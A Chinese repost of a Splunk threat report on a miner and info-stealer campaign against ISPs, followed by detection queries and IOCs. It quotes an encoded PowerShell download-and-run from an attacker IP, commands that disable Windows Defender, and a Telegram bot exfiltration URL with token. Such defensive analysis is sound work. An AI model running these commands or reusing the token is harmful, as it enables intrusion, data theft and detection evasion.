针对 ISP 的信息窃取活动

Splunk威胁研究团队发现了一项针对美国西海岸和我国 ISP 基础设施提供商的活动。这一大规模攻击活动源自东欧，使用简单的工具滥用受害者的计算机处理能力来安装具有多种功能的加密挖掘负载和二进制文件，例如： 

凭证滥用。主要载体和初始访问是通过使用众所周知的弱凭证（暴力破解）来驱动的

• 通过命令和控制 (C2) 服务器泄露数据。 

• 部署更多犯罪软件的能力

• 能够自行终止以避免被发现 

• 持久性和防御性以及禁用远程访问

• 将攻击转向目标 CIDR

Splunk 威胁研究团队观察到，攻击者执行的侵入操作很少，以避免被发现，但已被入侵的账户创建的工件除外。该攻击者还主要通过使用依赖和运行脚本语言（例如 Python 和 Powershell）的工具来移动和转移，从而使攻击者能够在受限环境下执行并使用 API 调用（例如 Telegram）进行 C2 操作。观察到的 IP CIDR 范围表明攻击者专门针对 ISP 基础设施，可能是为了执行加密挖掘操作（XMR）。

指标 

• 初始访问 ( T1078 ) 恶意行为者使用暴力攻击 ISP 基础设施以获取访问权限。攻击 IP 来自东欧。 

• 一旦参与者进入环境，他们就会删除一些二进制文件，并将这些二进制文件隐藏在名为 Migration 的文件夹中。 

• 此次攻击活动中使用的工具包括网络扫描工具（即 masscan.exe）、二进制文件（即 auto.exe、run.exe、MicrosoftPrt.exe），这些文件经测试存在信息窃取器负载和加密矿工负载。这些文件除了执行信息窃取器功能外，还执行 SSH 连接（C2）。在命名文件夹中，还会删除包含目标 IP 地址和密码的文本文件。  

• IP地址数量超过4K，专门针对美国西海岸和我国的互联网基础设施提供商  

• 包含挖矿和payload信息的C2和Host 

有效载荷分析 

在以下部分中，Splunk 威胁研究团队将分析此活动中使用的三个主要可执行文件 - MIG.RDP.EXE、Migrate.exe和X64.exe - 以识别和提取每个阶段采用的 MITRE ATT&CK® 策略和技术。 

在深入分析之前，我们将首先研究威胁行为者如何利用Windows 远程管理 (WINRM)来访问目标主机并执行这些有效负载。

Windows 远程管理 (T1021.006)

当密码未知或已获得密码哈希值时，威胁行为者使用暴力破解技术来获取帐户访问权限。一旦恢复用户名和密码，它将执行 WINRM 服务来部署有效载荷。

在图 1 和图 2 中，我们看到屏幕截图显示 cmd 和 PowerShell 执行了源自父进程 winrshost.exe 的多个进程。此进程树提供了明确的证据，表明威胁行为者利用 WINRM 服务来执行恶意负载。

图 1：通过 WINRM 执行几个 cmd/powershell

图2：通过WINRM执行几个cmd/powershell

解码 PowerShell 脚本后，如下面的代码块所示，威胁行为者正试图准备受感染的系统以进一步执行有效负载。此准备工作包括禁用安全产品功能以及终止或停止与加密矿工检测相关的服务。此外，通过 WINRM 服务执行的大量 PowerShell 脚本表现出的行为与我们发现的可执行文件之一 x64.exe 相同，我们将在本博客的后面详细分析它。

Set-MpPreference -DisableRealtimeMonitoring $TrueSet-MpPreference -ExclusionPath C:Windows , c:gwmi -Class'Win32_Process' | fl ExecutablePathsc.exe stop"Windows Updata"; sc.exe delete"Windows Updata"; sc.exe stop"Windows Management"; sc.exe delete"Windows Management":.

MIG.RDP.EXE 分析

图 3：mig.rdp.exe 感染链简单图（要查看该图的更大分辨率，请访问此链接）

命令和脚本解释器（T1059.001、T1059.003）

在 Splunk 威胁研究团队调查此活动期间，团队观察到一个名为 mig.rdp.exe 的文件通过 WINRM 服务下载到受感染的主机上。攻击涉及执行运行 Base64 编码的 PowerShell 脚本的 Windows 批处理脚本。此脚本有助于下载和执行文件，并将其保存为 C:usersmig.rdp.exe。

下面的两个代码块显示了两个编码的 PowerShell 脚本，用于下载和执行 mig.rdp.exe 负载。

编码的 Powershell 脚本： C:Windowssystem32cmd.exe /C powershell -encodedcommand KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUA bgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkAMwAuADMA MgAuADEANgAyAC4ANgA0AC8AbQBpAGcAXwBvAGIALgBlAHgAZQAnACwAJwBjADoAXAB1AHMAZQByAHMA XABtAGkAZwAuAHIAZABwAC4AZQB4AGUAJwApAAoA

解码（下载有效负载）：（new-object System.Net.WebClient）。DownloadFile （'hxxp[:]//193[.]32[.]162[.]64/mig_ob.exe'，'c:usersmig.rdp.exe'）

编码的 Powershell 脚本： C:Windowssystem32cmd.exe /C powershell -encodedcommand YwA6AFwAdQBzAGUAcgBzAFwAbQBpAGcALgByAGQAcAAuAGUAeABlAAoA解码：c:usersmig.rdp.exe

用户执行：恶意文件（T1204.002）

下载的 mig.rdp.exe 文件是一个 RAR SFX 可执行文件，它会释放三个附加文件：ru.bat、st.bat 和 migration.exe。所有这些文件都放在 C:ProgramData 目录中，并在受感染的主机上执行。攻击者选择使用 RAR SFX（自解压存档）而不是标准 RAR 文件，这使得攻击者可以将提取和执行过程合并为一个步骤。这种整合方法降低了部署的复杂性，并且无需受害者安装 RAR 软件或手动提取和运行文件，从而使恶意软件部署更加高效和可靠。

图 4：mig.rdp.exe 释放的文件。

文件和目录权限修改（T1222.001）

ru.bat 脚本是一个批处理文件，它只是触发 st.bat 的执行。st.bat 脚本旨在禁用 Windows Defender Antivirus 的实时监控功能。此外，它将 C: 根驱动器添加到 Windows Defender 的排除路径中，从而有效地逃避对该位置存储的所有恶意代码的检测。

除了防御规避技术之外，该可执行文件还使用 Windows 实用程序takeown和icacls.exe进一步修改了 C:WindowsTasks 目录的访问权限。此目录是执行过程中用于安装挖矿机和信息窃取恶意软件的其他文件的放置位置。

图 5 显示了如何使用ICACLS应用程序将 C:WindowsTasks 文件夹路径中的继承访问控制列表 (ACL) 权限启用为 (R,REA,RA,RD) 模式，即： 

• R——阅读

• REA——读取扩展属性

• RA——读取属性

• RD——读取数据/列表目录

图 5：启用目录的继承权限

这些权限使上面屏幕截图中列出的用户能够查看文件和目录并读取相关元数据和扩展属性 - 但不允许对文件、文件夹或其内容进行任何修改。这种防御规避技术是一种限制用户篡改或删除文件的简单方法。

最后，这个批处理脚本将执行migrate.exe，这是一个受密码保护的RAR SFX文件（密码：4432），用于提取并运行其中包含的压缩文件。

Migrate.exe 分析

Migrate.exe 将在 C:WindowsTasks 文件夹中释放多个文件，以进一步在受感染的主机上执行恶意活动。下面是一个简短的表格，列出了释放的文件以及每个文件的简短描述。

文件和目录权限修改（T1222.001）

除了通过migrate.exe部署各种比特币挖矿恶意软件外，一些相关组件文件还实施了旨在限制对其文件访问的特定功能或技术。这些措施旨在阻止某些用户或管理员查看、修改或删除恶意文件，从而增强恶意软件在系统中不被发现和持续存在的能力。

图 6 显示了“IntelConfigService.exe”反编译的 AutoIt 代码的屏幕截图，该代码检查受感染主机上是否存在某些进程实用工具。如果进程的窗口标题与“Process Hacker”匹配，则脚本将终止“ApplicationFrameHost.exe”进程，该进程被标识为 XMRig 加密矿工恶意软件。如果没有检测到任何进程实用工具，并且“ApplicationFrameHost.exe”和“wrap.exe”均未作为进程运行，则脚本将执行另一个 XMRig 比特币矿工“wrap.exe”。此外，它尝试通过使用 ICACLS 阻止特定用户（包括管理员）访问目录，拒绝访问“IntelConfigService.exe”所在的当前目录（C:WindowsTasks）。

它还将尝试运行“Superfetch.exe”（XMRig 比特币矿工的另一个变体）以及“MSTask.exe”。

图6：拒绝用户和管理员访问。

入口工具转移（T1105）

除了使用 icacls.exe 拒绝特定用户访问其文件之外，Python 编译的可执行文件 Mstask.exe 的一个功能是从其 C2 服务器下载另一个组件文件，该文件可能与比特币挖矿操作有关。不幸的是，截至撰写本文时，图 7 中显示的 URL 已无法访问。

图7：下载CoinMiner组件

启动或登录自动启动执行：注册表运行项/启动文件夹 (T1547.001)

批处理脚本 run.bat 由 C:WindowsTasks 中的 migration.exe 生成，它会创建一种持久性机制，确保在用户登录时或系统重启时自动执行该脚本。

图 8：启动持久性技术

创建或修改系统进程：Windows 服务 (T1543.003)

除了使用启动文件夹技术外，run.bat 还通过 C:WindowsTaskswmiic.exe 将 IntelConfigService.exe 组件安装为服务。此文件是第三方工具nssm的副本，用于在 Windows 操作系统中安装或启动服务。

图 8：安装并启动恶意软件作为服务

指标删除：文件删除（T1070.004）

建立权限提升和持久性后，它将删除先前放置在 C:ProgramData 目录中的文件和 C:Usersmig.rdp.exe 副本。

图 9：删除组件文件

自动收集（T1119）

MicrosoftPrt.exe 是一个 Python 编译的可执行文件，旨在窃取剪贴板中的信息。图 10 说明了它用于识别剪贴板中存储的潜在加密货币钱包地址的模式。这些模式专门用于检测比特币 (BTC)、以太坊 (ETH)、币安链 BEP2 (ETHBEP2)、莱特币 (LTC) 和波场币 (TRX) 等加密货币的钱包地址。

图 10：针对加密货币钱包的模式

通过利用 pyperclip.paste 库访问剪贴板数据，MicrosoftPrt.exe 在包含剪贴板内容的 ExchangeBuffer1 中搜索定义的模式。

图11：解析剪贴板数据

屏幕截图（T1113）

除了加密货币解析功能外，这个可执行文件（称为 clipbanker）还利用 pyautogui.screenshot 函数来捕获受感染主机的屏幕截图。捕获的图像随后保存到 C:ProgramDatascreenshot.png。

图 12：捕获屏幕截图

自动渗漏 (T1020)

在捕获受感染主机的屏幕截图并从剪贴板中提取潜在的加密货币钱包地址后，恶意软件会将这些数据发送到其 C2 服务器，该服务器通过 Telegram 机器人运行。图 13 提供了 MicrosoftPrt.exe 中的 Python 字节码的屏幕截图，显示了准备将收集的数据传输到 Telegram 机器人的过程。

图 13：Telegram Bot 作为 C2 服务器

由于在分析过程中无法完全反编译此 Python 可执行文件，因此我们只能依靠 Python 字节码来帮助我们格式化 Telegram 机器人 URL，该 URL 充当恶意软件发送收集的数据的 C2 服务器。下面的代码块提供了一个简化的伪代码，说明如何通过组合 Telegram 机器人中使用的初始化变量来形成 C2 URL。

Base URL: 'https[:]//api[.]telegram[.]org/bot'token: '6114976417:AAELsO_lvdyvXRw-Fwj5RmwJFc81WkgJOYI'Send Message Endpoint:'/sendMessage'Query Parameters:    chat_id: '552691400'    text:        Hostname (pc)        Username (user)'LTCn'        Clipboard content (ExchangeBuffer)'LTC' wallet address (Litecoin)complete C2 link for sending LTC data:https[:]//api[.]telegram[.]org/bot6114976417:AAELsO_lvdyvXRw-Fwj5RmwJFc81WkgJOYI/sendMessage?chat_id=552691400&text=nnLTCnn

X64.exe分析

此外，Splunk 威胁研究团队还观察到另一个文件通过 C:WindowsTasksApplicationFrameHost.exe 下载到受感染主机，名为 x64.exe。此文件是一个自解压 RAR SFX 可执行文件，使用密码“2582”执行时会提取多个文件，并且与我们在受感染主机中的 WINRM -> Powershell 执行中观察到的脚本执行相同。

然后，ApplicationFrameHost.exe 运行包含编码的 PowerShell 脚本的批处理脚本。

图 14：x64.exe 感染链（要查看该图的更大分辨率，请访问此链接https://imgur.com/a/0SaHd2W）

图 15：通过批处理脚本执行 x64.exe

用户执行：恶意文件（T1204.002）

一旦 PowerShell 脚本被解码，它就会终止与其组件可能相关的任何进程。然后它会下载 x64.exe 并将其保存在 C:WindowsMigration 文件夹中。

图16：下载x64.exe有效负载

X64.exe 将在 C:WindowsMigration 文件夹中释放多个文件，其中包括：

主动扫描（T1595）

Auto.exe 旨在从其 C2 服务器下载密码列表 (pass.txt) 和 IP 地址列表 (ip.txt)。此列表用于对具有特定 ISP CIDR 的目标 IP 地址集进行暴力破解。此有效负载还可以针对生成的 IP。在图 17 中，我们可以观察到恶意软件利用 masscan 工具对传递给该函数的 IP 地址执行主动扫描。

图 17：Masscan 函数

远程服务：SSH（T1021.004）

Splunk 威胁研究团队还观察到 Auto.exe 文件尝试通过 SSH 进行连接的一系列连接。检查 Auto.exe 的代码后发现，该恶意软件使用特定的 SSH 凭据通过 SSH 端口建立对 C2 服务器的远程访问。这些凭据很可能被硬编码到可执行文件中，允许恶意软件进行身份验证并与 C2 服务器通信。使用 SSH 进行通信表明该恶意软件正试图与服务器保持安全且持久的连接，使其能够发送和接收命令或窃取数据。 

图 18：SSH 连接尝试

图 19：SSH 连接凭证

远程服务：Windows 远程管理 (T1021.006)

Auto.exe 和 run.exe 都包含一个函数，用于检查给定 IP 地址上的 WINRM 服务（端口5985）是否打开，然后尝试使用先前下载的密码列表进行扫描。如果恶意软件成功连接或确认 WINRM 已打开，它会继续将经过验证的凭据发送到其 Telegram bot C2 服务器，类似于在其他组件中观察到的行为。此功能通过利用 WINRM 进行远程访问并传输被盗凭据以供进一步恶意使用，增强了恶意软件利用易受攻击的系统的能力。

图20：auto.exe WINRM检查功能

图21：run.exe WINRM检查功能

命令和脚本解释器：（T1059）

Run.exe 在受感染主机上执行多个脚本和 PowerShell 命令作为其清理过程的一部分。有趣的是，我们观察到通过 WINRM 服务执行 PowerShell 的模式与本博客中之前讨论的相同，特别是与 mig.rdp.exe 在受感染系统上的安装方式有关。这表明恶意软件持续使用 WINRM 执行各种任务（包括清理），以保持持久性并避免在受感染的主机上被发现。

图 22 显示了一段代码片段，其中显示了恶意软件执行的一系列 PowerShell 和批处理脚本。从中我们可以看到它再次下载并执行 mig.rdp.exe，可能是更新版本。此外，该恶意软件禁用 Windows Defender 功能并使用“ takeown ”和 ICACLS 执行各种访问修改，它们是用于获取文件所有权和更改访问控制列表的 Windows 实用工具。这些操作表明恶意软件正试图确保其在受感染主机上的存在，同时逃避检测并保持控制。

图 22：一系列指标删除 Powershell 脚本

服务停止（T1489）

作为清理过程的一部分，该恶意软件还会尝试删除计划任务并终止或停止与其组件相关的所有服务，包括与 Xmrig 加密矿工相关的任何服务。这些操作可能旨在消除恶意软件活动的痕迹，并确保它可以逃避受感染系统上的检测和持久性机制。

图 23：恶意软件的服务删除

修改注册表（T1112）

Run.exe 还通过修改注册表禁用 RDP 服务，并通过更改其服务配置禁用 WINRM 服务。这些操作旨在阻止远程访问并阻止任何可能重新控制受感染系统的企图，从而进一步确保恶意软件在受感染主机上的存在。

图 24：禁用 RDP 和 WINRM

删除帐户访问权限（T1531）

此外，恶意软件还会利用 Windows 操作系统中的“ quser ”实用程序，试图注销受感染主机上的所有活跃用户。此操作很可能是为了破坏正在进行的会话，并阻止用户检测或中断其恶意活动。

图 25：注销活动用户

该行为者在目标主机内的防御和后续操作期间观察到的行为似乎依赖于脚本语言（例如，Python 编译的可执行文件、PowerShell 命令），将这些操作的占用空间减少到最低限度，禁用防御机制，阻止远程访问并避免通过使用 Telegram API 调用 C2 来检测。 

这些行动可以被描述为“刚好 足够”成功对受害者实施攻击并获得尽可能多的处理能力。Splunk 威胁研究团队还能够通过Cisco Talos 情报中心验证此行为者。

图 26 显示了通过 Cisco Talos 情报中心识别的行为者 IP 地址。 

Virustotal 的进一步检查也证实了恶意活动。

图 27 显示了已识别的行为者 IP 地址在 Virus Total 上经过验证并确认为恶意的。

目标 

如本通报所述，攻击者瞄准了位于美国西海岸和我国的 ISP 基础设施提供商的特定 CIDR。攻击者使用 masscan 工具对这些 IP 进行攻击，该工具允许操作员扫描大量 IP 地址，随后可以探测这些 IP 地址是否存在开放端口和凭证暴力攻击。Splunk 威胁研究团队能够验证专门针对的 ISP 提供商的 4,000 多个 IP 地址。

Splunk 安全检测

Splunk 威胁研究团队开发了一套检测方法，帮助 Splunk 客户识别与此加密货币和信息窃取活动相关的潜在指标。这些检测方法（详见下文）已与其他相关检测方法一起纳入新的加密货币窃取者分析故事中。

可疑进程文件路径

以下检测可识别从通常与合法软件无关的文件路径运行的进程。它利用来自端点检测和响应 (EDR) 代理的数据，重点关注端点数据模型内的特定进程路径。

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_path IN("*\windows\fonts\*", "*\windows\temp\*", "*\users\public\*", "*\windows\debug\*","*\Users\Administrator\Music\*", "*\Windows\servicing\*", "*\Users\Default\*", "*Recycle.bin*","*\Windows\Media\*", "\Windows\repair\*", "*\temp\*" , "*\PerfLogs\*","*\windows\tasks\*", "*:\programdata\*") by  Processes.parent_process_name Processes.parent_process Processes.process_path Processes.dest  Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`

图28：可疑进程文件路径检测

在可疑路径中创建可执行文件或脚本

以下分析可识别在 Windows 系统上的可疑文件路径中创建的可执行文件或脚本。它利用 Endpoint.Filesystem 数据模型来检测在不常见目录（例如 windowsfonts、userspublic）中创建的具有特定扩展名（例如 .exe、.dll、.ps1）的文件。

| tstats `security_content_summariesonly` values(Filesystem.file_path) as  file_path count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem  where Filesystem.file_name IN ("*.exe", "*.dll", "*.sys", "*.com", "*.vbs","*.vbe","*.js", "*.ps1", "*.bat", "*.cmd", "*.pif") AND Filesystem.file_path IN ("*\windows\fonts\*","*\windows\temp\*", "*\users\public\*", "*\windows\debug\*", "*\Users\Administrator\Music\*", "*\Windows\servicing\*", "*\Users\Default\*", "*Recycle.bin*","*\Windows\Media\*","*\Windows\repair\*", "*\AppData\Local\Temp*", "*\PerfLogs\*","*:\temp\*") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`

图 29：可疑路径检测中的可执行文件或脚本创建

Windows 启动或登录自动启动在启动文件夹中执行

以下分析检测 Windows %startup% 文件夹中文件的创建，这是一种常见的持久性技术。它利用 Endpoint.Filesystem 数据模型来识别此特定目录中的文件创建事件。

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_path = "*\Microsoft\Windows\Start Menu\Programs\Startup\*"by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.user Filesystem.file_path Filesystem.process_guid Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`

图 30：Windows 启动或登录自动启动在启动文件夹检测中执行

Windows 文件和目录权限启用继承

以下检测可识别使用 ICACLS 启用权限继承的情况。此分析可识别使用 ICACLS 命令启用文件或目录权限继承的情况。/inheritance:e 标志用于恢复从父目录继承的权限，该标志受到监控，可检测可能重新应用更广泛的访问控制设置的更改。

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes    where Processes.process_name IN( "icacls.exe", "cacls.exe", "xcacls.exe") AND Processes.process = "*/inheritance:e*"by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_guid Processes.dest Processes.user    | `drop_dm_object_name(Processes)`    | `security_content_ctime(firstTime)`    | `security_content_ctime(lastTime)`

图 31：Windows 文件和目录权限启用继承检测

Windows 文件和目录权限删除继承

此检测可识别使用 ICACLS 删除文件或目录权限继承的情况。/inheritance:r 标志可剥离继承的权限，同时可选择保留或更改显式权限，可对其进行监控以检测可能限制访问或建立隔离权限配置的更改。

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) aslastTime from datamodel=Endpoint.Processes    where Processes.process_name IN( "icacls.exe", "cacls.exe", "xcacls.exe")   AND Processes.process = "*/inheritance:r*"by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_guid Processes.dest Processes.user    | `drop_dm_object_name(Processes)`    | `security_content_ctime(firstTime)`    | `security_content_ctime(lastTime)`

图 32：Windows 文件和目录权限删除继承检测

Telegram Bot API 发出的 Windows DNS 查询请求

以下分析检测到与 Telegram 相关的 DNS API 调用的使用，这可能表明通过恶意软件常用于 C2 通信的 Telegram BOT 进行访问。

`sysmon` EventCode=22  query = "api.telegram.org"   | stats countmin(_time) as firstTime max(_time) as lastTime by query answer QueryResults QueryStatus process_name process_guid Computer   | rename Computer as dest   | `security_content_ctime(firstTime)`   | `security_content_ctime(lastTime)`

图 33：Telegram Bot API 检测的 Windows DNS 查询请求

Windows 远程管理执行 Shell

以下分析检测到 winrshost.exe 的执行启动 CMD 或 PowerShell 进程作为潜在有效负载执行的一部分。winrshost.exe 与 WINRM 相关联，通常用于远程执行。

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes    where Processes.parent_process_name="winrshost.exe" AND Processes.process_name IN ("cmd.exe","*powershell*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_guid Processes.dest Processes.user    | `drop_dm_object_name(Processes)`    | `security_content_ctime(firstTime)`    | `security_content_ctime(lastTime)

图 34：Windows 远程管理执行 Shell 检测

Windows 文件和目录启用只读权限

以下分析检测到文件或文件夹权限被修改为授予只读访问权限的情况。此类更改的特点是存在与读取相关的权限（例如 R、REA、RA、RD），但缺少写入 (W) 或执行 (X) 权限。

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) aslastTime from datamodel=Endpoint.Processes   where Processes.process_name IN( "icacls.exe", "cacls.exe", "xcacls.exe") AND Processes.process IN ("*/grant*", "*/G*") AND Processes.process IN ("*SYSTEM*", "*admin*", "*S-1-1-0*", "*EVERYONE*")  by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_guid Processes.dest Processes.user  | `drop_dm_object_name(Processes)`  | rex field=process ":\((?[^)]+)\)"  | eval has_read_attribute=if(match(permission, "R"), "true", "false")  | eval has_write_execute=if(match(permission, "(W|GA|X|M|F|AD|DC|DE)"), "true", "false")  | where has_write_execute="true"and has_read_attribute = "true"  | `security_content_ctime(firstTime)`  | `security_content_ctime(lastTime)`

图 35：Windows 文件和目录启用只读权限检测

通过 Logoff Exec 删除 Windows 帐户访问权限

以下检测表明有人使用 quser 和 logoff 命令强行终止用户会话。此活动可能表示正在进行管理任务或潜在的未经授权的访问尝试。

| tstats `security_content_summariesonly` min(_time) asfirstTime max(_time) as lastTime from datamodel=Endpoint.Processes    where Processes.parent_process_name = powershell.exe AND Processes.process_name = logoff.exe by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_guid Processes.dest Processes.user    | `drop_dm_object_name(Processes)`    | `security_content_ctime(firstTime)`    | `security_content_ctime(lastTime)`

图 36：通过 Logoff Exec 检测删除 Windows 帐户访问权限

通过 RAR SFX 加密的 Windows 文件或信息

以下分析通过监控 SFX 安装期间与 RAR SFX .tmp 文件创建相关的文件生成来检测 RAR-SFX 文件的创建。此方法利用启发式方法根据指示可执行代码和压缩 RAR 数据组合的特定标记来识别 RAR SFX 档案。

`sysmon` EventCode=11 TargetFilename IN ("*__tmp_rar_sfx_access_check*")   | stats countmin(_time) as firstTime max(_time) as lastTime by Image TargetFilename Computer   | rename Computer as dest   | rename TargetFilename as file_name   | `security_content_ctime(firstTime)`   | `security_content_ctime(lastTime)`

图 37：通过 RAR SFX 检测 Windows 混淆文件或信息

总体而言，Crypto Stealer 分析故事介绍了 43 种检测，所有这些检测都映射到相关的 MITRE ATT&CK 技术。

IOCs

76b1237d26b94eb75ed600ba51d4b2414a8da48a30d06973921bcd0ee9fac7614d084a7e0c656d038d3176e97a4f807d094ce78f6b1f92a6ada7b93cf6a7cf0378f69097a5ba8480e39d735732d22319d7f4d05002940d99b326970353c8a545713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d0816d2f6194d1b1989fbef4572055dbf62a0d6a2570b316ac15722192f1c559a5095c101a0164af189cc282eb2d67e143b42e6d57d7ef396d59715a355a3162b966c36d61ad03e33dc3bc5d26e336855c4ab147541ccb989a35d3ed470fd1d521f9e24c7b4604aa3022325b62154ac80dc76533fa96a3418d8e15d28c998fb9c5311bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f27681cf2bdb1cdd34bb50d60f21b8208041913747b8deca5f26aa187d2e8c0e9a105270b8685104389b8341dc7c68fb362579170b82bffe89cc964cb27c10e496f08644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f27682b8be1bbaf17a69326f65096a31054a1198e66a83e31c37d1eee1c2580d6c7fa837dc4e83fcefc8334384c88d672eb2dee31bceb64657ca7bb4322536a81019257d0b8a89b216aadb6525bccfdb67917d52e239856ae9011721e84746b99571ef98a335a128a062323476454ae7c5490c5a134461ab49ee05afa81b4714d033c

原文始发于微信公众号（Ots安全）：针对 ISP 的信息窃取活动